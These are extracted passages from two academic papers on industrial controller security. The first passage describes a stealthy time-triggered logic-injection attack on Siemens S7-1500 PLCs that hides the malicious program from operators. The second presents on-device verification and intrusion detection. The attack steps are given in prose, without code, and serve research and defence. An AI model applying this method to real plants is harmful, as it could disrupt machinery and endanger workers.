any other bytes dedicated to security purposes. Consequently, we can conclude that the Source Code attribute is not integrity checked by the PLC and attackers could maliciously replace this attribute with another one from an already pre-recorded S7CommPlus message. Thus by using Scapy4, we can craft the attacker s S7CommPlus download message by substituting theSource Code attribute of the ProgramCycleOB object of the malicious program with the Source Code attribute of the ProgramCycleOB object of the original user-program. Figure 7 depicts this method. In such a scenario and whenever the ICS supervisor requires the control logic from the infected PLC, it will respond by sending the ProgramCycleOB object stored in its memory. The TIA Portal then decompiles the Source Code attribute which is eventually representing the original user-program not the 4Scapy (https://scapy.net/) is a powerful packet manipulation program written in python. It features a variety of packet manipulation capabilities including: snif ng and replaying packets in the network, network scanning, tracerouting, etc. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. Fig. 7: Crafting the S7CommPlus download message attacker s program. This method deceives the ICS operator by showing him always the original user-program, whilst the PLC executes a different one. 4)Transferring the Crafted S7 message : Our crafted download packet comprises of the following attributes: the Object MAC andObject Code attributes of the malicious program, and the Source Code attribute of the user- program. To push the message into the target PLC, we used our developed PLCinjector tool published in [32]. The tool is dedicated to inject S7-1500 PLCs and has two Functions. The rst function is employed to compromise the two integrity protection modules that S7CommPlusV3 utilizes i.e. the pre- fragment messages protection and the session key exchange protocol. Whilst the second function is based on Scapy, and used to send the adversary s download packet to the PLC after the proper modi cation to the session ID, and certain integrity elds of the S7 message are done. It is worth mentioning that our PLCinjector tool could be also used on all the S7-1500 PLCs sharing the same rmware as Siemens has designed the new S7 key exchange mechanism with a strong assumption that all PLCs have the same rmware version utilize also the same public-private key mechanism [19]. B.Triggering phase (Of ine) After we inject our malicious program into the target PLC, we go of ine and close the current live session with the victim and its network. The malicious program, precisely with the next execution cycle, will be executed and the CPU checks the interrupt condition in each execution cycle. Our patch remains in idle mode, and unobserved in the PLC s memory until the interrupt condition is met i.e., once the date of the attack, the attacker sets, matches the date of the CPU, the interrupt will be triggered, and the malicious instructions in block OB10 will then be processed. In our experimental setup, we programmed the OB10 to impose particular motors to switch off at a speci c time and date when we are disconnected from the control network. VI. RESULTS , EVALUATION ,AND MITIGATION In this section, we show the results of implementing our attack scenario presented in the former section, and evaluatethe service disruption of the control process due to our patch. After that, we discuss our experimental results and suggest some possible mitigation methods to save our industrial sys- tems from such a serious attack. A.Results For achieving convincing results, we conducted ve attack scenarios on the industrial modules of our Fischertechnik factory. In the following we explain only one scenario in details as the other scenarios are performed in the same way. The rst attack scenario aims at confusing the VGR module. This module operates using 8 motors as follows: vertical motor up (%Q2.0) , vertical motor down (%Q2.1) , horizontal motor backwards (%Q2.2) , horizontal motor forwards (%Q2.3) , turn motor clockwise (%Q2.4) , turn motor anti-clockwise (%Q2.5) , compressor (%Q2.6) , and valve vacuum (%Q2.7) . Those 8 motors (PLC s outputs) are assigned to speci c parameters in a data block, namely QX_VGR and used in the control logic program as: QX_VGR_M1_VerticalAaxisUp_Q1 , QX_VGR_M1_VerticalAaxisDown_Q2 , QX_VGR_M2_HorizontalAxisBackward_Q3 , QX_VGR_M2_HorizontalAxisForward_Q4 , QX_VGR_M3_RotateClockWise_Q5 , QX_VGR_M3_RotateCounterclockwise_Q6 , QX_VGR_Compressor_Q7 , QX_VGR_ValveVacuum_Q8 respectively. For confusing the VGR module, we inserted our OB10 with speci c commands to switch all the 8 motors off at the point zero for the attack. Afterwards we patched the PLC following the four steps explained in section V . Our results showed that we managed successfully to update the PLC s program without recording any physical impact in the time between patching the PLC, and the very determined moment to attack i.e. the workpiece keeps moving normally between the industrial modules. Once the clock of the victim CPU matches the time and date that we already con gured, we observed that the VGR module stopped moving. Moreover, the workpiece that is being shipped by the gripper has fallen down. This is due to the fact that the compressor that provides the appropriate air ow to transport the good was switched off. This led to an inappropriate operation, and the movement sequence of the workpieces was successfully confused. In a real-world plant e.g., automobile manufacturing industry, such a disturbance might be signi cantly catastrophic and costs even human lives. We extracted the outputs linked to the PLC in the same way for the other modules i.e HBW, MPO, SLD, and SSC, and then programmed the interrupt block OB10 to force the corresponding outputs to switch off when the interrupt block is being activated. Our results showed that the PLC always updates its program, and we could successfully keep the interrupt block for each infection in idle mode until the very moment determined by us. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. Fig. 8: Boxplot presenting the measured execution cycle times of OB1 for ve attack scenarios B.Evaluation Siemens PLCs, by default, store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE [8]. Therefore, to evaluate the resulting disturbance of our patches on the control process accurately, we added a small SCL code snippet to our user-program that stores the last cycle time in a separate data block. Afterwards, we recorded as many as 4096 execution cycles for each scenario, calculated the arithmetic mean value, and eventually used the Kruskal-Wallis and the Dunn s Multiple Comparison test for statistical analysis. All our experimental results are shown in gure 8. Our results show that the mean value of executing OB1 for the rst infection (i.e. attacking VGR module) is approx. 38 milliseconds (ms), and slightly differs from the mean value of executing OB1 for the original user-program (baseline) which is almost 36 ms. The execution cycle time when we attacked the HBW module raised also slightly. We recorded a mean value as high as 37 ms. Our patch dedicated to attack the MPO module introduced a mean value of cycle time as high as 40 ms, whilst the highest value that our experiments recorded was when we patched the control logic with OB10 dedicated to confuse the SLD module. We noticed that the mean value raised to reach 46 ms. Patching the control logic with an OB10 to disrupt the functionality of SSC module did not record a noticeable difference in executing OB1 where the mean value that we registered was 37 ms. From all this, we could conclude that checking the interrupt condition of our malicious block (OB10) in each execution cycle does not impact on the execution process of the PLC s program, and the Fischertechnik system keeps operating nor-mally. In order to conceal our infection successfully, we need to take into consideration that executing the malicious program should not exceed the overall maximum execution time of 150 ms [8]. However, all our infections are unlikely to trigger this timeout as they are quite small compared to 150 ms. Furthermore, the size of the OB10 blocks used in our infections were quite small (almost between 6 to 9 KB). Therefore, our attack approach more likely will not exceed the free available space in the PLC s memory to store the extra malicious block that the attacker patches. C.Mitigation An appropriate recommendation we keenly suggest is to solve the integrity mechanism issues in the S7-1500 PLCs that our investigations found. The new improved mechanism must include two-way group authentication between PLCs and a TIA Portal software. But on other hand, we also under- stand that such a fundamental solution needs a while to be implemented as it requires a high cost and may probably have side-effects. Moreover, Industrial components have a longer life-cycle than the common IT devices. Thus, we believe that they, PLCs, may not be updated on time. As a result, exposed devices will still operate in real-world industrial environments. In this term, an proper immediate solution could be integrating a network detection into the existing ICS settings. For instance, a control logic detection [23], and veri cation [28], [29] can be employed to alleviate the current situation. As our infections were concealed inside the PLC, precisely in the memory, partitioning the memory space and enforcing memory access control [24] could be also a convenient solution. Another solution would be implementing a digital signature for control Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. messages such as control logic manipulation, network monitor- ing tools like SNORT [25], ArpAlert [26], and ArpWatchNG [27] for disclosing any threat involving MITM approach, and a security mechanism to scan and double check the protocol header that contains critical data about the type of the payload. All those suggestions are recommended to detect and block any potential unauthorized transmission of the control logic. VII. CONCLUSION This paper extended our attack approach introduced in [8] to involve the newest SIMATIC PLCs line. Based on the design vulnerabilities in S7-1500 PLCs, we performed a sophisticated injection attack scenario that infects an exposed PLC with aTime-of-Day block (OB10). The malicious interrupt block allows attackers to trigger the patch at a certain time and date, and eventually to disturb the industrial process without being neither connected to the PLC nor to its network at the point zero for the attack. Our investigations proved the concept of that the original control logic program is always displayed on the legitimate TIA Portal, whilst the infected PLC runs another program. On other hand, our malicious program does not exceed the overall maximum execution time of 150 ms. Hence, the industrial process is not interrupted/disturbed when the patch is in idle mode. For all that, the malicious infection will not be detected even if the ICS supervisor re-activates the security means before re-operating the system. Finally, we provided some possible security recommendations to secure our ICS environments from such a severe threat. REFERENCES [1] H. Wardak, S. Zhioua and A. Almulhem, "PLC access control: a security analysis," 2016 World Congress on Industrial Control Systems Security (WCICSS), 2016, pp. 1-6, doi: 10.1109/WCICSS.2016.7882935. [2] W. Alsabbagh and P. Langend rfer, "A Stealth Program Injection Attack against S7-300 PLCs," 2021 22nd IEEE International Con- ference on Industrial Technology (ICIT), 2021, pp. 986-993, doi: 10.1109/ICIT46573.2021.9453483F. [3] D. Beresford, "Exploiting Siemens Simatic S7 PLCs", Black Hat USA, 2011. [4] J. Klick, S. Lau, D. Marzin, J. -O. Malchow and V . Roth, "Internet- facing PLCs as a network backdoor," 2015 IEEE Conference on Communications and Network Security (CNS), 2015, pp. 524-532, doi: 10.1109/CNS.2015.7346865. [5] A. Spenneberg, M. Br ggemann and H. Schwartke, "PLC-blaster: A worm living solely in the PLC", Black Hat Asia Marina Bay Sands, 2016. [6] N. Govil, A. Agrawal and N. O. Tippenhauer, On Ladder Logic Bombs in Industrial Control Systems, January 2018. [7] K. Sushma, A. Nehal, Y . Hyunguk and A. Irfan, CLIK on PLCs! Attacking Control Logic with Decompilation and Virtual PLC, 2019. [8] W. Alsabbagh and P. Langend rfer, "Patch Now and Attack Later - Exploiting S7 PLCs by Time-Of-Day Block," 2021 4th IEEE Interna- tional Conference on Industrial Cyber-Physical Systems (ICPS), 2021, pp. 144-151, doi: 10.1109/ICPS49255.2021.9468226. [9] W. Alsabbagh and P. Langend rfer, "A Control Injection Attack against S7 PLCs -Manipulating the Decompiled Code," IECON 2021 47th Annual Conference of the IEEE Industrial Electronics Society, 2021, pp. 1-8, doi: 10.1109/IECON48115.2021.9589721. [10] N. Falliere, Exploring Stuxnet s PLC infection process, Sept. 2010. [11] Y . Hyunguk, and A. Irfan, "Control Logic Injection Attacks on Industrial Control Systems," 2019, dio:10.1007/978-3-030-22312-0_3 [12] Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure, https://www. reeye.com/blog/threat-research/2017/12/ attackers-deploy- new-ics-attack-framework-triton.html, [Online; accessed 12-April-2021].[13] R. M. Lee, M. J. Assante, and T. Conway, "Analysis of the cyber-attack on the Ukrainian power grid," Technical report, SANS E-ISAC, March 18 2016. Available at: https://ics.sans.org/media/ESAC_SANS_Ukraine_DUC_5. pdf. [14] S. Senthivel et al., Denial of Engineering Operations Attacks in industrial Control Systems , Proceedings of the Eighth ACM Confer- ence on Data and Application Security and PrivacyMarch 2018 Pages 319 329https://doi.org/10.1145/3176258.3176319. [15] G. liang, S. R. Weller, J. Zhao, F. Luo, and Z.Y . Dong, "The 2015 Ukraine blackout: Implications for false data injection at- tacks," IEEE Transactions on Power Systems, 2016, doi: 10.1109/TP- WRS.2016.2631891. [16] F. Wei berg, Analyse des Protokolls S7CommPlus im Hinblick auf ver- wendete Kryptographie, March, 26, 2018. Available at: https://www.os- s.net/publications/thesis/Bachelor_Thesis_Weissberg.pdf [17] T. De Maizi re, "Die Lage Der IT-Sicherheit in Deutschland 2014," The German Federal Of ce for Information Security,2014. Avaliable at: https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/ Lageberichte/ Lagebericht2014.pdf. [18] T. Wiens. S7comm Wireshark dissector plugin, January 2014. Available at: http://sourceforge.net/projects/ s7commwireshark. [19] E. Biham, S. Bitan, A. Carmel, A. Dankner, U. Malin, and A. Wool, Rogue7: Rogue Engineering-Station attacks on S7 Simatic PLCs , Black Hat USA 2019, 2019. [20] C. Lei, L. Donghong, and M. Liang, The spear to break the security wall of S7CommPlus , Black Hat USA 2017, 2017. [21] H. Hui, K. McLaughlin, Investigating Current PLC Security Is- sues Regarding Siemens S7 Communications and TIA Poral , DOI: 10.14236/ewic/ICS2018.8. [22] A. Ayub, H. Yoo and I. Ahmed, "Empirical Study of PLC Au- thentication Protocols in Industrial Control Systems," 2021 IEEE Security and Privacy Workshops (SPW), 2021, pp. 383-397, doi: 10.1109/SPW53761.2021.00058. [23] H. Yoo, S. Kalle, J. Smith, and I. Ahmed, Overshadow Plc to Detect Remote Control-Logic Injection Attacks, in International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment. Springer, 2019, pp. 109 132. [24] C. H. Kim, et al., (2018). Securing Real-Time Microcontroller Sys- tems through Customized Memory View Switching, (2018), doi: 10.14722/ndss.2018.23117. [25] M. Roesch et al., Snort: Lightweight intrusion detection for networks. in Lisa, vol. 99, no. 1, 1999, pp. 229 238. [26] Arpalert, https://www.arpalert.org/arpalert.html, [Online; accessed 15- March-2021]. [27] arpwatch, https://en.wikipedia.org/wiki/Arpwatch, [Online; accessed 15-March-2021]. [28] S. Zonouz, J. Rrushi, and S. McLaughlin, Detecting industrial control malware using automated plc code analytics, IEEE Security & Privacy, vol. 12, no. 6, pp. 40 47, 2014. [29] M. Zhang, C.-Y . Chen, B.-C. Kao, Y . Qamsane, Y . Shao, Y . Lin, E. Shi, S. Mohan, K. Barton, J. Moyne et al., Towards automated safety vetting of PLC code in real-world plants, in 2019 IEEE Symposium on Security and Privacy (SP). IEEE, 2019, pp. 522 538. [30] https://support.industry.siemens.com/cs/document/109773506/simatic- step-7-basic-professional-v16-and-simatic-wincc-v16?dti=0&lc en-WW [31] H. Hui, K. McLaughlin, and S. Sezer, "Vulnerability analysis of S7 PLCs: Manipulating the security mechanism," International Journal of Critical Infrastructure Protection, V olume 35, 2021, 100470, ISSN 1874- 5482, https://doi.org/10.1016/j.ijcip.2021.100470. [32] W. Alsabbagh and P. Langendorfer, "A New Injection Threat on S7-1500 PLCs - Disrupting the Physical Process Of ine," in IEEE Open Journal of the Industrial Electronics Society, doi: 10.1109/OJIES.2022.3151528. [33] https://ipcsautomation.com/blog-post/market-share-of-different-plcs/ [34] https://roboticsandautomationnews.com/2020/07/15/top-20- programmable-logic-controller-manufacturers/33153/ [35] https://www.statista.com/statistics/897201/global-plc-market-share-by- manufacturer/ [36] W. Alsabbagh and P. Langend rfer, "A Remote Attack Tool Against Siemens S7-300 Controllers: A practical Report", Kommunikation und Bildverarbeitung in der Automation, Technologien f r die intelligente Automation 14, doi:10.1007/978-3-662-64283-2_1. [37] https://github.com/Mknea/dippasofta/blob/master/S7CommPlusScanner.py Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply.
Detecting_PLC_control_corruption_via_on-device_runtime_verification.pdf
With an increased emphasis on the cyber-physical security of safety-critical industrial control systems, pro- grammable logic controllers have been targeted by both secu- rity researchers and attackers as critical assets. Security and veri cation solutions have been proposed and/or implemented either externally or with limited computational power. Online veri cation or intrusion detection solutions are typically dif cult to implement within the control logic of the programmable logic controller due to the strict timing requirements and limited resources. Recently, there has been an increased advancement in open controller systems where programmable logic controllers are coupled with embedded hypervisors running operating sys- tems with much more computational power. Development envi- ronments are provided that allow developers to directly integrate library function calls from the embedded hypervisor into the program scan cycle of the programmable logic controller. In this paper, we leverage these coupled environments to implement online cyber-physical veri cation solutions directly integrated into the program scan cycle as well as online intrusion detection systems within the embedded hypervisor. This novel approach allows advanced security and veri cation solutions to be directly enforced from within the programmable logic controller program scan cycle. We evaluate the proposed solutions on a commercial- off-the-shelf Siemens product. I. I NTRODUCTION The security of Programmable Logic Controllers (PLCs) is increasingly becoming a vital issue in securing industrial con- trol systems (ICS). There is an inherent dif culty integrating security into these PLCs as they are intended to be simple computing machines whose programs can be easily veri ed with the underlying physical systems they are controlling. Adding advanced security tools can compromise the time- sensitive operations as well as any general temporal attributes of the cyber-physical system. The security of PLCs continues to receive an increased amount of attention in the wake of ICS-targeted malware. ICS-CERT reports that in FY 2015 [1], they responded to 295 reported incidents involving critical infrastructure in the United States. Most programming and operator commands are sent using insecure proprietary network protocols. Not onlyhave proprietary protocols been reverse engineered, but open- source API s [2] have been released that allow programmers to develop invasive tools that can be used with malicious intent, such as PLCInject [3]. Additionally, open source packet dissectors have been developed for network protocol analyzers. The reverse engineering of certain proprietary protocols has resulted in new protocols being developed with encrypted communication. Although these protocols can provide secure communication for the latest products, they are typically only supported by later devices while the legacy devices remain vulnerable to packet injection attacks. Of ine security solutions such as TSV [4] and [5] have been proposed as bump-in-the-wire veri cation mechanisms sitting between the operator/programmer interface and the PLC. These solutions have provided the ability to verify the programs downloaded to the PLC against temporal safety properties. Furthermore, models have been proposed for of ine analysis of periodic traf c to and from a PLC [6]. These solutions were typically provided as external solutions, where more advanced processing systems are coupled with the PLC system to verify the programming inputs of the PLC. This allows for the advanced operations that require an abundance of memory such as the calculation of advanced physical properties of a system or processing the network traf c. Modular embedded controllers introduced the concept of coupling a PLC with an embedded hypervisor. The hypervi- sors are typically much more advanced embedded operating systems than the actual PLC. APIs are provided for developing programs that can be directly integrated into the programming blocks of the PLC either synchronously or asynchronously through shared memory between the PLC and the hypervisor. Development environments are provided to generate program- ming blocks that can call an associated library function on the hypervisor, e.g., a DLL le on a Windows hypervisor, allowing the PLC to pass inputs and take in outputs from the library function within the main PLC scan cycle [7]. In this paper, we leverage these coupled environments to978-1-5090-2002-7/16/$31.00 2016 IEEE 67 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. implement online security solutions directly integrated into the PLC. We rst provide a novel approach to implementing a cyber-physical veri cation solution directly integrated into the scan-cycle of the PLC using the embedded hypervisor to perform advanced calculations of the underlying physical system. We then present an online monitoring solution that provides an IDS based on aforementioned security models of periodic PLC traf c. Before providing further details of our solutions, it is im- portant to note that Industrial Control Systems should always be secured using a holistic approach as outlined in security standards such as IEC 62443. The layered security architecture derived from IEC 62443 can be summarized by considering Plant Security, Network Security, and System Integrity as shown in Figure 1. Fig. 1. The Concept of Defense-in-Depth Security solutions as applied in an industrial context must take into account these layers of protection. For example, the solutions described in this paper are part of the System Integrity layer which supports Detection of attacks . This paper is organized as follows. First, we provide a high-level overview of how our security solutions will be integrated into PLCs as well as our threat model in Section II. Then we present a model for a cyber-physical veri cation solution that leverages the shared memory between the PLC and the embedded hypervisor in Section III. Next, we present a model for a passive intrusion detection solution within the embedded hypervisor that provides online modeling of the network traf c within the PLC in Section IV. We then show how we implemented and evaluated our security solutions in Section V. Finally, we present related work in Section VI and conclude in Section VII. II. O VERVIEW The two security solutions presented in this paper leverage the coupling of embedded hypervisors and PLCs. Figure 2 shows an overview of how both models would be integrated into the PLC. For our cyber-physical veri cation solution, programming blocks are generated and directly integrated synchronously or asynchronously into the main scan cycle of Physical System PLC Shared Mem Control System Network Protocol Analysis Safety Verification Embedded Hypervisor Control Logic Fig. 2. System Overview. The coupled system communicates with the control system network. The PLC runs the control logic program that interfaces with the underlying physical system. The embedded hypervisor shares memory with the PLC and can run models with advanced calculations for protocol analysis and safety veri cation. the PLC that shares memory with a library on the embedded hypervisor. The threat model for this solution assumes that memory protection mechanisms are in place that can limit PLC clients to write to designated areas of memory. As we will detail in section III, these designated areas are treated as temporary buffers before the data along with the system state is veri ed within the embedded hypervisor and then forwarded to a destination buffer. Therefore, this model assumes that an attacker cannot circumvent this mechanism by directly writing to the destination buffer. If the proprietary protocol in question has been reverse-engineered, then the attacker might have the ability to remotely program the PLC and dictate the control ow of the program. The second IDS solution allows online intrusion detection from within the PLC. The threat model assumes that the hypervisor is inaccessible, i.e., cannot be tampered with, and that the hypervisor shares the same Ethernet channel as the PLC. This allows the embedded hypervisor to directly monitor all traf c coming into the PLC Ethernet port and to model the PLC from within the embedded hypervisor. Additionally, in both cases, the threat model assumes that a secure reporting mechanism is in place. Although the solutions provide detection mechanisms and active veri cation solutions, they do not emphasize secure reporting mechanisms to the operators and/or programmers. Actionable items upon intrusion are outside of the scope of this paper. III. C YBER -PHYSICAL VERIFICATION WITHIN A PLC SCAN CYCLE Previous bump-in-the-wire veri cation solutions have been implemented in order to symbolically verify the logical pro- grams downloaded to a PLC against temporal safety prop- erties. However, these solutions rely heavily on the sound-68 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. PLC Temporary Buffer Operator/Programmer Destination Buffer Embedded Hypervisor Verification Library 1 2 3 Fig. 3. CPS Veri cation: (1) PG/Client/HMI writes to temporary buffer; (2) A function in the veri cation library is called to verify this value; (3) If value doesn t violate safety constraints, the value in the temporary buffer is transferred to the destination buffer ness and completeness of their external, of ine veri cation solutions. There is an inherent dif culty in de ning and verifying cyber-physical safety properties given the variety of inputs in a typical PLC program and the complexity of the underlying physical invariant properties. Similarly, IDS models are passive external security solutions. Previously proposed models seem to have only been implemented for of ine traf c analysis. In both cases, there is no active veri cation of values written to memory in the PLC. PLCs support memory pro- tection and access control, but several programs still provide PLC clients with the capability of modifying the variables that represent discrete attributes of the cyber-physical solution. Using PLCs coupled with embedded hypervisors, active cyber-physical veri cation solutions of values written to mem- ory can be implemented and directly integrated into the scan cycle of a PLC. Our solution leverages this coupling to verify values written to areas of memory in the PLC. A high-level overview and control ow of a sample solution is presented in Figure 3. The solution works by restricting writes to the memory in the PLC to designated temporary buffers in memory. When a write to the temporary buffer is detected, the functional programming block associated with the embedded hypervisor library function is invoked and passes the system state to the embedded hypervisor. The written value is veri ed against previously de ned temporal safety properties based on the underlying physical model and the current system state. If the value written to the temporary buffer doesn t violate any safety or security constraints, the embedded hypervisor will return a signal to the PLC that allows this value to be forwarded to the destination memory buffer. Otherwise, the transfer will be blocked and a noti cation can be raised to the operator that an unsafe command has been issued. PLC Embedded Hypervisor R Q Deterministic Finite Automata Control System Network O1 O2 I1 I2 I3 I4 Control Logic Scan Cycle Fig. 4. Passive IDS implementation within the embedded hypervisor. The PLC and the hypervisor listen on the same port. The hypervisor maintains a model of the traf c for anomaly detection, such as the expected queries ( Q) and responses ( R) in an ethernet protocol, in parallel to the PLC running the control logic program. The purpose of interacting with the embedded hypervisor is to provide the ability of advanced calculations of the underlying physical system model. For example, if a PLC is controlling signi cant components of an electric power grid, e.g., circuit breakers and tap changers of transformers, the embedded hypervisor can take care of running optimal power ow equations to determine the impact of a particular action in real time, e.g., opening/closing a circuit breaker. IV. A UTOMATON -BASED CONTROLLER ANOMALY DETECTION The embedded hypervisors can also be used to implement online IDS from within the PLC. IDS solutions have been proposed for modeling PLC traf c for the purpose of detecting malicious packets. Our solution is based on the deterministic nite automaton (DFA) solution presented in [8] and [6]. Figure 4 presents a simple DFA example of Modbus traf c. In this system, an expected periodic traf c pattern is a sequence of four packets: a rst query ( Q1), a response to the rst query ( R1), a second query ( Q2), and a response to the second query ( R2). If a subsequent packet represents the next expected state in the pattern, then we have a Normal transition from one DFA state to the next. If the subsequent packet is the same as the current packet, then we have a Retransmission and the DFA remains in the same state. If the subsequent packet is not the expected packet and is within the subset of fQ1,R1, Q2,R2g, then we have a Miss and the DFA state transitions to the state of the subsequent packet. If the subsequent packet is not the expected packet and is not within this subset, then we have an Unknown and the DFA transitions to the beginning of the pattern sequence. An Unknown transition is the worst type of transition and can generally be expected to be an intrusion. Further details of the DFA algorithm as well as its application to speci c PLC Ethernet protocols can be found in the aforementioned papers.69 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. CPU 1515 Embedded Win7 WinAC ODK DLL WinAC ODK FB1 WinAC ODK FB1 WinAC ODK FB1 OB1 HMI2PLC DB Trigger 1 Trigger 2 Trigger 3 Laser Cutting System (HMI Panel) Malicious Client Fig. 5. CPS Veri cation Solution. WinAC ODK implementation allows the main scan cycle programming block, OB1, to invoke the automatically generated functional programming blocks, FB, associated with the veri cation library functions of the DLL located in the embedded hypervisor. The data block, HMI2PLC DB, can be written to by the legitimate HMI panel of our cyber-physical system or by a malicious client on the network. V. E VALUATIONS In this section, we present our evaluations and implemen- tations of the two proposed security solutions. Both of our solutions were implemented using the SIMATIC ET 200SP Open Controller, CPU 1515 PC. The PLC has a hypervisor with Windows Embedded 7E 32-Bit. We used SIMATIC WinAC Open Development Kit (ODK) to implement both of our solutions. The WinAC ODK provides an API for Microsoft Visual Studio that allows developers to generate DLLs with desired library functions to be stored on the embedded hypervisor, while also generating the associated programming blocks that are directly downloaded to the PLC and can interface with the DLL through shared memory. A. Cyber-physical Veri cation Solution The previous simple scenario was directly integrated into a cyber-physical simulation program. Figure 5 provides an overview of the cyber-physical system used in our solution. The associated physical system in this scenario is a laser- cutting tool that places materials onto a cutting platform and cuts a particular shape speci ed by the operator. Typically the HMI reads from and writes to a speci c DB, which we labeled HMI2PLC . We developed an attack scenario in which a hacker uses a Snap7 client to inject malicious packets that alter this DB. We integrated the WinAC ODK functions directly into the main cyclic programming block, OB1. Table I provides the safety speci cations of our sample security solution. The rst safety speci cation states that the system should not receive a manual direction signal moving the cutter up,down, left, or right while the system is in Auto mode, mean- ing that the cutting should be automatic. When OB1 detects a direction signal, a call to the associated WinAC ODK function is triggered. The WinAC ODK function will then check the relevant status bits and, if there is a violation of the safety speci cation, it will raise an alarm (e.g., a noti cation will be raised on the HMI panel). The second safety speci cation states that the laser-cutter s homing position (i.e., the position the cutter returns to when it has nished a full cutting-cycle) cannot change while the system is not in Auto mode and the system is not in Idle mode, which is just the mode that indicates the cutter is standing idle. If OB1 detects that either the X- or Y-coordinate of the homing position setting has changed, it will invoke the associated WinAC ODK function in the same manner to verify the change against these safety rules. If the WinAC ODK function detects a violation, it will raise a signal that forces the system to nish the current cutting cycle and stop production until the operator acknowledges the intrusion. The nal speci cation just states that the cutting speed of the laser cannot change while in Auto mode and while the Cutting indicator is true. If OB1 detects a change in the cutting speed, it will invoke another WinAC ODK function that issues and Emergency Stop signal if the rule was violated. Although these rules could have been easily implemented using simple ladder logic or STL programming, they serve as place holders for advanced calculations for physical equations. Our goal was to demonstrate a highly-coupled PLC veri - cation solution. Furthermore, these solutions can be directly integrated into the scan cycle timing and allow develop- ers to account for the veri cation solution in their timing speci cations. The associated programming blocks can be invoked synchronously or asynchronously depending on the safety/operational requirements of the scan cycle. This IDS relies on the assumption that the proprietary protocol is not reverse-engineered. If the PLC s programming protocol(s) are reverse engineered, a hacker who is able to establish a programming connection to the PLC can just program any blocks to overwrite or skip over the security implementation. B. Online Automaton-based Anomaly Detection Solution Our IDS solution implements an online analysis using T- Shark [9] to inspect every packet from within the embedded hypervisor. Using our knowledge of the S7-comm protocol from David Nardella s analysis, we built our solution on top of an already existing S7-comm Wireshark dissector plugin. We directly integrated the DFA IDS into the packet-dissection so that every packet over S7-comm protocol is processed through our model.70 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. TABLE I SAFETY SPECIFICATIONS FOR LASER -CUTTING SYSTEM Trigger Signal Safety Conditions Violation Response Manual Direction Click( ",#, ,!) !(Auto) Noti cation Home Position Changed !(Auto) && !(Idle) Stop Production Cutting Speed Changed !(Auto) && !(Cutting) Emergency Stop Incoming Packet: 1 Training Phase 2 Enforcement Phase Model Generation Q1 R1 Q2 Q2 Pattern Buffer: New Packet: Fig. 6. Deep packet inspection from within PLC. The solution rst trains the model by queueing the headers of the rst 1500 incoming packets and generating a DFA based on the training set, usually as a sequence os queries, Q, and responses, R. This DFA will then be used to enforce intrusion detection within the hypervisor Figure 6 shows an overview of our IDS implementation. T-Shark will listen on port 102, i.e., the shared PLC Ethernet port, for incoming packets and our plugin will dissect any packets that utilize the S7-comm protocol. As in [6], we have a learning stage (where the periodic pattern is learned) and an enforcement stage (where each packet is checked against the learned pattern). The symbols of our DFA are based solely on the headers of the S7-comm PDU. We split any multi- reads or multi-writes into individiual symbols. For example, if one packet speci es a write to 18 variables, we will split that packet into 18 separate symbols with the same pre x. Initially, we set our max pattern length to be 1500 symbols, with a validation window size of 6000 (these numbers taken from the latter aforementioned paper). Therefore, our plugin will queue the rst 6000 packets which are assumed to be benign. Starting at a pattern length of 2 and increasing up to 1500, we check to see which pattern length best ts the periodic data. A pattern s performance is essentially determined by the number of Normals over the total number of transitions ( Normals + Misses+Retransmissions +Unknowns ). Once we select an appropriate pattern, we can then set this pattern as our DFA. Each subsequent symbol is checked against this DFA and any Misses, Retransmissions, or Un- knowns will be reported accordingly. In our solution, we had the program write a portion of memory that would signal an alarm whenever an Unknown symbol was detected. Furthermore, we had to modify our validation window size and max pattern length as the simulation program generated much more symbols than 1500 in one cycle. We reinforced the IDS solution by ensuring that Retrans- mission packets were valid. Because the DFA solution discardsthe actual data values being written to variables, an attacker could generate a packet that has the same symbols as a previous packet and manipulate the data. Because the pattern is periodic, the attacker can then nd a way to inject the packet so that it lands in the sequence just before or after the same packet in the pattern. The DFA solution would simply identify this packet along with the extra acknowledgement packet as Retransmission symbols (since there will most likely be two acknowledgement packets in a row). To resolve this issue, we simply keep a data buffer that holds the data of the previous packet. If the current packet is identi ed as a Retransmission, we just compare the two data buffers and make sure nothing has been changed. Although this does not mitigate the case for Misses (as the data would not be expected to be the same), we can guarantee that valid Retransmissions are benign. In addition to not being able to validate Miss packets, there are a couple of limitations with this IDS solution. First, it relies on the data being highly periodic. For fully automated systems where there is little to no human interaction, our IDS solution would have an extremely high intrusion-detection accuracy. However, most industrial control systems involve operators who use HMI panels to send commands to the PLCs. The simulation program was designed to simulate an operator that starts the cutting process between 1 and 10 seconds every cycle. This operation will generate one symbol, i.e., the packet the operator sends to start the cutting process. This symbol will almost always be identi ed as a Miss since the operator starts the process at a different point in the pattern sequence every time. This false positive could most likely be mitigated by adapting the learning process to the application-speci c pattern. There are many ways to modify the algorithm by incorporating supervised learning. As a stand- alone, unsupervised process, though, our algorithm can only guarantee that Normal, Retransmission, and Unknown packets will be properly identi ed and handled accordingly. However, the goal of this solution was to present a sample IDS solution that can be embedded within the PLC. Having an advanced embedded hypervisor coupled with the PLC allows the system to provide online deep-packet inspection. VI. R ELATED WORK In this section, we will present several related veri cation and security solutions for PLCs. It is worth noting that our71 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply. solutions emphasize the ability to verify and secure the PLC from within the device, not the security 